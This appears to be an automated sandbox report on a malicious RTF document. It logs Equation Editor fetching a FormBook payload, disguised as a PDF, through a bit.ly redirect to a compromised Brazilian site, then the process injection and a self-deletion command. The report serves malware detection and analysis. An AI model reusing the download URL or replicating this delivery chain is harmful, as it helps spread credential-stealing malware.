                                                                                                                                                                                  • Rich Text Format (4004/1) 44.44%
                                                                                                                                                                                  File name:IMG-50230.doc
                                                                                                                                                                                  File size:1332844
                                                                                                                                                                                  MD5:447225e0d19daba3ebaa394a72b72318
                                                                                                                                                                                  SHA1:ade2804cac4b052d9fb2af635dd2b7e4dd960853
                                                                                                                                                                                  SHA256:39e2a7aebe3542b3caf9fca72de467f409766056a29923042ec91c5140503409
                                                                                                                                                                                  SHA512:2f74b1fc9677e7dc5d9be9a51c3157a7d52c0c8b74be1c83003197333cb06e4ba08bf4a22a4001ccbcb9e38fca0050b5fe837da42a03812495215b5062e3ca15
                                                                                                                                                                                  SSDEEP:24576:xmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzmzms49Q8KVB:bqC
                                                                                                                                                                                  File Content Preview:{\rtf76859\page87576133526591799@QG6TZCUef77hz7vS@-yiRKBY9aGnTX9PDq8<eh&&0_M-D_g--_-d,64>36845$Cv>yt=n5|:%_>jn6%bm\mklP;=u\h86%89.65.... .... ...... .... .... ...

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                                                  Static RTF Info

                                                                                                                                                                                  Objects

                                                                                                                                                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                                                  0001389DEhno

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Jan 27, 2021 06:51:24.620235920 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:24.667917967 CET804916567.199.248.11192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:24.668248892 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:24.668931007 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:24.969619036 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:25.017587900 CET804916567.199.248.11192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.115094900 CET804916567.199.248.11192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.115402937 CET4916580192.168.2.2267.199.248.11
                                                                                                                                                                                  Jan 27, 2021 06:51:25.707030058 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966017008 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966172934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966811895 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.225644112 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232167006 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232237101 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232274055 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232312918 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232352972 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232388973 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232426882 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232445955 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232456923 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232490063 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232506037 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232531071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232539892 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232574940 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232606888 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.237232924 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491837978 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491914034 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491965055 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492057085 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492074966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492111921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492119074 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492150068 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492189884 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492222071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492279053 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492301941 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492337942 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492382050 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492440939 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492456913 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492499113 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492512941 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492552996 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492604017 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492640972 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492667913 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.492705107 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.495444059 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752238035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752271891 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752290964 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752307892 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752325058 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752326965 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752342939 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752353907 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752357960 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752362013 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752362013 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752365112 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752377033 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752379894 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752393007 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752398968 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752419949 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752419949 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752439022 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752441883 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752450943 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752456903 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752469063 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752473116 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752490044 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752494097 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752509117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752511024 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752526045 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752531052 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752542973 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752557993 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752563000 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752567053 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752579927 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752590895 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752597094 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752610922 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752614975 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752618074 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752630949 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752633095 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752650976 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752650976 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752667904 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.752691031 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:26.753751993 CET4916680192.168.2.22177.70.106.69

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Jan 27, 2021 06:51:24.503771067 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:24.551803112 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:24.552100897 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:24.599993944 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.191107988 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648433924 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648818016 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:25.705070972 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:30.180989027 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:30.238764048 CET53528388.8.8.8192.168.2.22

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                  Jan 27, 2021 06:51:24.503771067 CET192.168.2.228.8.8.80x7e45Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.552100897 CET192.168.2.228.8.8.80x7e45Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.191107988 CET192.168.2.228.8.8.80xef41Standard query (0)neuromedic.com.brA (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648818016 CET192.168.2.228.8.8.80xef41Standard query (0)neuromedic.com.brA (IP address)IN (0x0001)

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                  Jan 27, 2021 06:51:24.551803112 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.551803112 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.599993944 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.599993944 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648433924 CET8.8.8.8192.168.2.220xef41No error (0)neuromedic.com.br177.70.106.69A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.705070972 CET8.8.8.8192.168.2.220xef41No error (0)neuromedic.com.br177.70.106.69A (IP address)IN (0x0001)

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • bit.ly
                                                                                                                                                                                  • neuromedic.com.br

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  0192.168.2.224916567.199.248.1180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  Jan 27, 2021 06:51:24.668931007 CET0OUTGET /3iWebUT HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: bit.ly
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Jan 27, 2021 06:51:24.969619036 CET1OUTGET /3iWebUT HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: bit.ly
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Jan 27, 2021 06:51:25.115094900 CET1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                  Date: Wed, 27 Jan 2021 05:51:25 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Content-Length: 130
                                                                                                                                                                                  Cache-Control: private, max-age=90
                                                                                                                                                                                  Location: http://neuromedic.com.br/cgi./IMG-50230.pdf
                                                                                                                                                                                  Set-Cookie: _bit=l0r5Pp-3298995411bad0e715-00a; Domain=bit.ly; Expires=Mon, 26 Jul 2021 05:51:25 GMT
                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 75 72 6f 6d 65 64 69 63 2e 63 6f 6d 2e 62 72 2f 63 67 69 2e 2f 49 4d 47 2d 35 30 32 33 30 2e 70 64 66 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                  Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://neuromedic.com.br/cgi./IMG-50230.pdf">moved here</a></body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  1192.168.2.2249166177.70.106.6980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966811895 CET2OUTGET /cgi./IMG-50230.pdf HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Host: neuromedic.com.br
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232167006 CET3INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Wed, 27 Jan 2021 05:50:55 GMT
                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                  Last-Modified: Tue, 26 Jan 2021 23:10:22 GMT
                                                                                                                                                                                  ETag: "1d056b5-ccfe8-5b9d5c24f5257"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 839656
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Type: application/pdf


                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                  Statistics

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:35
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                                                  Imagebase:0x13fdc0000
                                                                                                                                                                                  File size:1424032 bytes
                                                                                                                                                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:36
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:41
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Users\Public\69577.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\Public\69577.exe
                                                                                                                                                                                  Imagebase:0x830000
                                                                                                                                                                                  File size:839656 bytes
                                                                                                                                                                                  MD5 hash:BEB09E991A41577E79DFABC58178A44F
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:47
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                  Imagebase:0x810000
                                                                                                                                                                                  File size:42176 bytes
                                                                                                                                                                                  MD5 hash:DA55A7AED2F65D6104E1A79EE067CC00
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:52
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:
                                                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:52:02
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                  File size:44544 bytes
                                                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:52:06
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                                                                                                                  Imagebase:0x4ac20000
                                                                                                                                                                                  File size:302592 bytes
                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                  Reset < >